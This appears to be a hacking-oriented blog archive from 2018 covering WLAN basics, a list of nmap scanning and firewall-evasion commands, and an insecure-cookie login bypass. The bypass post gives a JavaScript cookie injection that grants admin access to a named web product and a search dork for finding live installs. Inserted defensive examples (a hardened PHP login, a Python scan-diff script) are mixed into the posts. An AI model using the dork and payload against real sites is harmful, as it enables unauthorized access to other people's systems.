Sunday, March 25, 2018

Wireless Local Area Network



For my very first introductory post, since the boss asked me to write one, I'm kicking things off with a little about WLAN. I posted it because I think covering the theory alongside all the hacking stuff makes it more effective.

A wireless network can be connected in the following two ways. They are:
1) Ad hoc Mode
2) Infrastructure Mode

1) Ad hoc Mode (IBSS)
Ad hoc mode is also called an Independent Basic Service Set. In Ad hoc mode, computers connect to one another using only their wireless adapters; no intermediary device is needed for that connection.



2) Infrastructure Mode (BSS)
Infrastructure mode is also called a Basic Service Set. In Infrastructure mode, computers connect to one another using a wireless adapter together with a wireless access point (or wireless router). Which wireless adapter is used therefore depends on the user's choice.
 




Wi-Fi Technology
Wi-Fi stands for Wireless Fidelity. Wi-Fi is a technology used for Wireless Local Area Networks (WLAN) and is based on the IEEE 802.11 standard. Wi-Fi originally used the 2.4GHz frequency of the IEEE 802.11b standard, but it can later also be used with the other IEEE 802.11 standards (802.11a, 802.11b, 802.11g, 802.11n). Wi-Fi technology does not work over a physical wire connection between sender and receiver; data is sent and received only by radio frequency. RF currents are fed to the antenna, which creates an electromagnetic field that propagates through the air. To send and receive data over RF in this way, any Wi-Fi network needs an access point. An access point is the intermediary device used in Infrastructure mode; it is the device that lets the wireless clients in a wireless network communicate with one another. An access point has the following three modes:

1) Root Mode
2) Repeater Mode
3) Bridge Mode

1) Root Mode
Root mode means the access point connects directly to the wired network. The access point reaches the wired network through its own Ethernet interface.

2) Repeater Mode
Repeater mode means the access point reaches the wired network through another access point to which it is directly connected. In other words, an access point in Repeater mode associates with an upstream access point (one in Root mode) and connects to the wired network through it.
3) Bridge Mode
Bridge mode is the mode used to interconnect two different access points. I'll explain wireless antennas next.
Wireless Antennas
To connect a wireless network over longer distances and extend the range of the IEEE 802.11 standard, external antennas become necessary. (Hand-made antennas can be built, but I have found they are not very effective.) Wireless networks mainly use the following antennas:

1) Omni Directional Antenna
2) Directional Antenna


1) Omni Directional Antenna
An omni directional antenna is a common base antenna type and forms a point-to-multipoint system. It is used as the main antenna when distributing signals to other computers, laptops and PDAs. With an omni directional antenna the wireless waves travel 360 degrees. Therefore, if this antenna is used in a point-to-point system, the signal range will be shorter, and for that reason omni directional antennas are not recommended for point-to-point systems. Omni directional antennas are mostly used for indoor units.

2) Directional Antenna

Directional antennas are used for outdoor units. Their signal waves travel in a 45 degree beam. Directional antennas are used for point-to-point systems and sometimes, depending on how they are installed, for multipoint systems as well. The antenna at the bottom costs around 900 Thai baht.

Insecure Cookie Handling



This is a vuln where admin access is obtained through a web server's flawed cookie handling.
For example, take a look at the code of vuln.php.

Code

<?php
if($_POST['password'] == $thepass) {
    // the "logged in" flag is handed to the client as a plain cookie
    setcookie("is_user_logged","1");
} else { die("Login failed!"); }
............ etc .................
// the flag is then read back from the client and trusted as-is
if($_COOKIE['is_user_logged']=="1") {
    include "admin.php";
} else { die('not logged'); }

What goes wrong here is the variable called "is_user_logged": if that cookie exists in the browser with the value 1, the user is treated as logged in. So right there,

javascript:document.cookie = "is_user_logged=1; path=/";

just injecting that piece of JavaScript is enough to be logged in.

If you look at the vuln that turned up in Online Email Manager, you'll understand it even better.

Dork: Powered by Online Email Manager

Say it is at http://www.site.com/demo/OEM/admin/index.php. There,

inject javascript:document.cookie = "auth=admin; path=/"; and then just go to emailList.php ( http://www.site.com/demo/OEM/admin/emailList.php )

and you'll find you're already logged in as admin.
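For contrast, here is the hardened counterpart of vuln.php as an added example (not the post's own code): the login state lives in a server-side PHP session, so a value written with document.cookie cannot forge it. The $ADMIN_HASH placeholder and the cookie settings are assumptions; admin.php is the file named in the post.

```php
<?php
// Added example, not the post's code: session-based login that replaces the
// client-trusted "is_user_logged" cookie. The client only ever holds an
// opaque session id; the flag itself never leaves the server.
$ADMIN_HASH = '$2y$10$PLACEHOLDER_hash_from_password_hash'; // hypothetical stored hash

// Cookie attributes must be set before the session cookie is sent.
session_set_cookie_params([
    'httponly' => true,   // not readable through document.cookie
    'secure'   => true,   // only sent over HTTPS
    'samesite' => 'Lax',  // not attached to cross-site POSTs
]);
session_start();

if (isset($_POST['password'])) {
    // Compare against a stored hash, never against a plaintext $thepass.
    if (password_verify($_POST['password'], $ADMIN_HASH)) {
        session_regenerate_id(true);      // fresh id on privilege change
        $_SESSION['is_user_logged'] = true;
    } else {
        die("Login failed!");
    }
}

// Authorization comes from $_SESSION, which the client cannot write.
if (!empty($_SESSION['is_user_logged'])) {
    include "admin.php";
} else {
    die('not logged');
}
```

The same change fixes the Online Email Manager case: an "auth=admin" cookie is ignored because emailList.php would consult $_SESSION rather than $_COOKIE.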

Saturday, March 24, 2018

Nmap Kung-Fu {Basic Scanning technique}


You've probably heard that pentesters and the big-name hackers alike keep Nmap close at hand ... when starting to break into a host / server / system, nmap plays the main role as the very first step ... there's a version for Windows users too.. but using it on Windows feels a bit off, in my opinion ...

What is nmap >>> http://nmap.org/
For Windows users >>> http://nmap.org/book/inst-windows.html
Nmap online tool >>> http://nmap-online.com/ // darn, there was already an online one... only just found out... hehe....

Below you'll find nmap's basic scanning techniques ... they're very useful ... Maung Dok isn't saying you need them right this moment ... but someday you definitely will.. and if you remember this little post when that time comes .. it was worth posting ..

Basic Scanning Techniques

Scan a single target --> nmap [target]
Scan multiple targets --> nmap [target1,target2,etc]
Scan a list of targets --> nmap -iL [list.txt]
Scan a range of hosts --> nmap [range of IP addresses]
Scan an entire subnet --> nmap [IP address/cidr]
Scan random hosts --> nmap -iR [number]
Excluding targets from a scan --> nmap [targets] --exclude [targets]
Excluding targets using a list --> nmap [targets] --excludefile [list.txt]
Perform an aggressive scan --> nmap -A [target]
Scan an IPv6 target --> nmap -6 [target]

Discovery Options

Perform a ping scan only --> nmap -sP [target]
Don't ping --> nmap -PN [target]
TCP SYN ping --> nmap -PS [target]
TCP ACK ping --> nmap -PA [target]
UDP ping --> nmap -PU [target]
SCTP INIT ping --> nmap -PY [target]
ICMP echo ping --> nmap -PE [target]
ICMP timestamp ping --> nmap -PP [target]
ICMP address mask ping --> nmap -PM [target]
IP protocol ping --> nmap -PO [target]
ARP ping --> nmap -PR [target]
Traceroute --> nmap --traceroute [target]
Force reverse DNS resolution --> nmap -R [target]
Disable reverse DNS resolution --> nmap -n [target]
Alternative DNS lookup --> nmap --system-dns [target]
Manually specify DNS servers --> nmap --dns-servers [servers] [target]
Create a host list --> nmap -sL [targets]

Advanced Scanning Options

TCP SYN scan --> nmap -sS [target]
TCP connect scan --> nmap -sT [target]
UDP scan --> nmap -sU [target]
TCP NULL scan --> nmap -sN [target]
TCP FIN scan --> nmap -sF [target]
Xmas scan --> nmap -sX [target]
TCP ACK scan --> nmap -sA [target]
Custom TCP scan --> nmap --scanflags [flags] [target]
IP protocol scan --> nmap -sO [target]
Send raw Ethernet packets --> nmap --send-eth [target]
Send IP packets --> nmap --send-ip [target]

Port Scanning Options

Perform a fast scan --> nmap -F [target]
Scan specific ports --> nmap -p [ports] [target]
Scan ports by name --> nmap -p [port name] [target]
Scan ports by protocol --> nmap -sU -sT -p U:[ports],T:[ports] [target]
Scan all ports --> nmap -p "*" [target]
Scan top ports --> nmap --top-ports [number] [target]
Perform a sequential port scan --> nmap -r [target]

Version Detection

Operating system detection --> nmap -O [target]
Submit TCP/IP fingerprints --> www.nmap.org/submit/
Attempt to guess an unknown OS --> nmap -O --osscan-guess [target]
Service version detection --> nmap -sV [target]
Troubleshooting version scans --> nmap -sV --version-trace [target]
Perform an RPC scan --> nmap -sR [target]

Timing Options

Timing templates --> nmap -T [0-5] [target]
Set the packet TTL --> nmap --ttl [time] [target]
Minimum number of parallel connections --> nmap --min-parallelism [number] [target]
Maximum number of parallel connections --> nmap --max-parallelism [number] [target]
Minimum host group size --> nmap --min-hostgroup [number] [targets]
Maximum host group size --> nmap --max-hostgroup [number] [targets]
Initial RTT timeout --> nmap --initial-rtt-timeout [time] [target]
Maximum RTT timeout --> nmap --max-rtt-timeout [time] [target]
Maximum retries --> nmap --max-retries [number] [target]
Host timeout --> nmap --host-timeout [time] [target]
Minimum scan delay --> nmap --scan-delay [time] [target]
Maximum scan delay --> nmap --max-scan-delay [time] [target]
Minimum packet rate --> nmap --min-rate [number] [target]
Maximum packet rate --> nmap --max-rate [number] [target]
Defeat reset rate limits --> nmap --defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment packets --> nmap -f [target]
Specify a specific MTU --> nmap --mtu [MTU] [target]
Use a decoy --> nmap -D RND:[number] [target]
Idle zombie scan --> nmap -sI [zombie] [target]
Manually specify a source port --> nmap --source-port [port] [target]
Append random data --> nmap --data-length [size] [target]
Randomize target scan order --> nmap --randomize-hosts [target]
Spoof MAC address --> nmap --spoof-mac [MAC|0|vendor] [target]
Send bad checksums --> nmap --badsum [target]

Output Options

Save output to a text file --> nmap -oN [scan.txt] [target]
Save output to an XML file --> nmap -oX [scan.xml] [target]
Grepable output --> nmap -oG [scan.txt] [target]
Output all supported file types --> nmap -oA [path/filename] [target]
Periodically display statistics --> nmap --stats-every [time] [target]
l33t output --> nmap -oS [scan.txt] [target]

Troubleshooting and Debugging

Help --> nmap -h
Display Nmap version --> nmap -V
Verbose output --> nmap -v [target]
Debugging --> nmap -d [target]
Display port state reason --> nmap --reason [target]
Only display open ports --> nmap --open [target]
Trace packets --> nmap --packet-trace [target]
Display host networking --> nmap --iflist
Specify a network interface --> nmap -e [interface] [target]

Nmap Scripting Engine

Execute an individual script --> nmap --script [script.nse] [target]
Execute multiple scripts --> nmap --script [expression] [target]
Script categories --> all, auth, default, discovery, external, intrusive, malware, safe, vuln
Execute scripts by category --> nmap --script [category] [target]
Execute multiple script categories --> nmap --script [category1,category2,etc] [target]
Troubleshoot scripts --> nmap --script [script] --script-trace [target]
Update the script database --> nmap --script-updatedb

Ndiff

Comparison using Ndiff --> ndiff [scan1.xml] [scan2.xml]
Ndiff verbose mode --> ndiff -v [scan1.xml] [scan2.xml]
XML output mode --> ndiff --xml [scan1.xml] [scan2.xml]
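To show what the -oX output and the Ndiff comparison above actually give a defender, here is an added example (not from the post or from pentestlab) that parses two nmap XML results and reports which open ports appeared or disappeared between scans, the way a scheduled baseline scan would flag a newly exposed service. The two XML snippets are constructed samples in nmap's -oX layout, trimmed to the elements the diff needs.

```python
import xml.etree.ElementTree as ET

# Constructed samples in nmap -oX format (two scans of one host, trimmed to
# the elements the diff needs); these are not real scan results.
SCAN_BEFORE = """<nmaprun scanner="nmap"><host><status state="up"/>
<address addr="192.0.2.10" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
<port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
<port protocol="tcp" portid="3306"><state state="filtered"/><service name="mysql"/></port>
</ports></host></nmaprun>"""

SCAN_AFTER = """<nmaprun scanner="nmap"><host><status state="up"/>
<address addr="192.0.2.10" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
<port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
<port protocol="udp" portid="161"><state state="open"/><service name="snmp"/></port>
</ports></host></nmaprun>"""


def open_ports(xml_text):
    """Map each host address to its set of open (protocol, port, service)."""
    result = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address")
        if addr_el is None:
            continue
        found = set()
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not exposure
            svc = port.find("service")
            name = svc.get("name") if svc is not None else "unknown"
            found.add((port.get("protocol"), int(port.get("portid")), name))
        result[addr_el.get("addr")] = found
    return result


def diff_scans(before_xml, after_xml):
    """Return {host: {"opened": [...], "closed": [...]}} for hosts that changed."""
    before, after = open_ports(before_xml), open_ports(after_xml)
    changes = {}
    for host in sorted(set(before) | set(after)):
        b, a = before.get(host, set()), after.get(host, set())
        opened, closed = sorted(a - b), sorted(b - a)
        if opened or closed:  # ndiff prints these as + and - port lines
            changes[host] = {"opened": opened, "closed": closed}
    return changes
```

For the samples above, diff_scans reports 3306/tcp (mysql) and 161/udp (snmp) as newly open and 80/tcp (http) as no longer open on 192.0.2.10; a host whose open-port set is unchanged is omitted entirely.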

Credit: http://pentestlab.wordpress.com/